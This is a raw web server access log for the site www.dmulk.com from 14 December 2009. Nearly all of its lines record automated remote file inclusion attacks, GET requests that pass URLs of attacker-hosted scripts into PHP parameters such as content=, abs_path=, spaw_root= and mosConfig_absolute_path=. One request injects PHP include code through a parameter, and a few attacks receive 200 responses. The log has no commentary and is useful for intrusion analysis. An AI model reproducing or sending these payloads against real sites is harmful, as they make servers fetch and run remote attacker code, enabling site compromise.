209.92.156.53 - - [14/Dec/2009:08:00:12 -0800] "GET /logs/access_080511.log%20%20//appserv/main.php?appserv_root=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:00:22 -0800] "GET /logs/access_080414.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:00:22 -0800] "GET /logs/access_080901.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:00:29 -0800] "GET /logs/access_080901.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:00:29 -0800] "GET /logs/access_080414.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
202.88.229.100 - - [14/Dec/2009:08:00:35 -0800] "GET /logs/access_080701.log%20//admin/editor2/spaw_control.class.php?spaw_root=http://21tv.org/bbs/idd.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.168.42 - - [14/Dec/2009:08:00:36 -0800] "GET /logs/access_080221.log//index.php?p=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.117.195 - - [14/Dec/2009:08:00:43 -0800] "GET /index2.php?page=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [14/Dec/2009:08:00:43 -0800] "GET /logs/index2.php?page=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [14/Dec/2009:08:00:43 -0800] "GET /logs/access_090130.log%20%20/index2.php?page=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:00:54 -0800] "GET /logs/access_081010.log//appserv/main.php?appserv_root=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [14/Dec/2009:08:01:04 -0800] "GET /logs/access_090520.log%20%20/index2.php?page=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:01:07 -0800] "GET /mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:01:07 -0800] "GET /logs/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:01:07 -0800] "GET /logs/access_080901.log/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:01:07 -0800] "GET /logs/access_080414.log/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:01:08 -0800] "GET /logs/access_080901.log/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:01:08 -0800] "GET /mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:01:08 -0800] "GET /logs/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:01:08 -0800] "GET /logs/access_080414.log/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.71.237.150 - - [14/Dec/2009:08:01:22 -0800] "GET /logs/access_080527.log//trans/trans.php?trans=&p=http://www.ozin.co.kr/data/file/notice/mcnid.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.71.237.150 - - [14/Dec/2009:08:01:30 -0800] "GET /logs//trans/trans.php?trans=&p=http://www.ozin.co.kr/data/file/notice/mcnid.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.71.237.150 - - [14/Dec/2009:08:01:39 -0800] "GET /logs/access_080521.log//trans/trans.php?trans=&p=http://www.ozin.co.kr/data/file/notice/mcnid.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:02:23 -0800] "GET /logs/access.log/view.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:03:03 -0800] "GET /logs/access_090213.log%20%20//index.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:03:16 -0800] "GET /logs/access_080901.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:03:16 -0800] "GET /logs/access_080414.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:03:20 -0800] "GET /logs/access_080901.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:03:20 -0800] "GET /logs/access_080414.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:03:22 -0800] "GET /logs/access_080906.log%20%20//index.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.116.0.130 - - [14/Dec/2009:08:03:34 -0800] "GET /logs/access_080326.log//errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
208.116.0.130 - - [14/Dec/2009:08:03:35 -0800] "GET /errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
208.116.0.130 - - [14/Dec/2009:08:03:35 -0800] "GET /logs//errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:04:10 -0800] "GET /logs/access.log/view.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:04:28 -0800] "GET /logs/access_080901.log/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:04:28 -0800] "GET /logs/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:04:28 -0800] "GET /mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:04:28 -0800] "GET /logs/access_080414.log/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:04:57 -0800] "GET /logs//index.php?abs_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:04:57 -0800] "GET /logs/access_080616.log//index.php?abs_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:04:59 -0800] "GET /index.php?abs_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 200 14823 "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:05:17 -0800] "GET /logs/access_091120.log//index.php?abs_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:05:42 -0800] "GET /logs/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:05:42 -0800] "GET /logs/access_080901.log/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:05:43 -0800] "GET /mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:05:44 -0800] "GET /logs/access_080414.log/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:05:52 -0800] "GET /logs/access_080616.log%20%20//index.php?abs_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:05:52 -0800] "GET /logs/access_091120.log%20%20//index.php?abs_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [14/Dec/2009:08:06:27 -0800] "GET /vbgsitemap-config.php?base=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [14/Dec/2009:08:06:27 -0800] "GET /logs/access_081103.log%20%20//vbgsitemap-config.php?base=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [14/Dec/2009:08:06:27 -0800] "GET /logs//vbgsitemap-config.php?base=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [14/Dec/2009:08:06:31 -0800] "GET /logs/access_080523.log%20%20//vbgsitemap-config.php?base=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:07:03 -0800] "GET /logs/access_080909.log//common/db.php?commonpath=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [14/Dec/2009:08:07:18 -0800] "GET /logs/access_081103.log//vbgsitemap-config.php?base=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [14/Dec/2009:08:07:18 -0800] "GET /logs/access_080523.log//vbgsitemap-config.php?base=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:07:43 -0800] "GET /logs//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:07:44 -0800] "GET /modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:07:44 -0800] "GET /modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:07:44 -0800] "GET /logs//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:07:48 -0800] "GET /logs/access_090322.log%20%20/?seccion=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:07:48 -0800] "GET /logs/access_090503.log%20%20/?seccion=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:07:48 -0800] "GET /logs/?seccion=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 130218 "-" "Mozilla/5.0" "www.dmulk.com"
213.198.76.196 - - [14/Dec/2009:08:07:49 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:07:49 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:07:49 -0800] "GET /?seccion=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 14966 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:07:50 -0800] "GET /logs/access_080414.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:07:50 -0800] "GET /logs/access_080901.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.198.76.196 - - [14/Dec/2009:08:07:51 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 200 14889 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:07:54 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:07:55 -0800] "GET /logs/access_090530.log//skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:07:55 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:07:55 -0800] "GET /skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:07:59 -0800] "GET /logs/access_090530.log//skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:07:59 -0800] "GET /skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:08:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:08:10 -0800] "GET /logs/access_090514.log//skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:08:13 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:08:14 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:08:14 -0800] "GET /logs/access_090514.log//skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:08:26 -0800] "GET /logs/access_080901.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:08:26 -0800] "GET /logs/access_080414.log%20%20/mcf.php?content=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:09:16 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:09:20 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:09:32 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:09:34 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [14/Dec/2009:08:10:23 -0800] "GET /logs/access_090520.log/index2.php?page=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:10:49 -0800] "GET /logs/access_090322.log%20%20/?seccion=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:10:49 -0800] "GET /logs/access_090503.log%20%20/?seccion=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:10:49 -0800] "GET /logs/?seccion=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 130218 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:10:49 -0800] "GET /modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:10:49 -0800] "GET /logs//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:10:49 -0800] "GET /?seccion=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 14965 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:10:57 -0800] "GET /logs//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:10:57 -0800] "GET /modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:10:57 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:11:00 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.22.14.131 - - [14/Dec/2009:08:11:00 -0800] "GET /modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://195.22.14.131/teste/gorum/lang/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:11:09 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:11:09 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:11:09 -0800] "GET /logs/access_090808.log%20%20/skins/advanced/advanced1.php?pluginpath[0]=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:11:13 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.116.0.130 - - [14/Dec/2009:08:11:29 -0800] "GET /logs/access_080531.log//errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
208.116.0.130 - - [14/Dec/2009:08:11:29 -0800] "GET /errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
208.116.0.130 - - [14/Dec/2009:08:11:29 -0800] "GET /logs//errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:11:35 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:12:08 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
88.131.106.20 - - [14/Dec/2009:08:12:11 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.dmulk.com"
88.131.106.20 - - [14/Dec/2009:08:12:16 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.0" 200 786432 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:12:19 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:12:24 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:12:28 -0800] "GET /logs/access_090807.log%20%20/skins/advanced/advanced1.php?pluginpath[0]=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:12:29 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:12:46 -0800] "GET /common/func.php?CommonAbsDir=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:12:46 -0800] "GET /logs//common/func.php?CommonAbsDir=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:12:52 -0800] "GET /logs/access_090523.log//common/func.php?CommonAbsDir=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:12:59 -0800] "GET /logs/access_081103.log%20//skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.182 - - [14/Dec/2009:08:13:13 -0800] "GET /logs/access_081103.log%20//skin/zero_vote/error.php?dir=http://ardayu.isgreat.org/file/id.tcl??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:13:15 -0800] "GET /logs/access_080906.log//common/func.php?CommonAbsDir=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:14:02 -0800] "GET /logs/access_071228.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:14:02 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:14:02 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:14:05 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:14:05 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:14:05 -0800] "GET /logs/access_071228.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
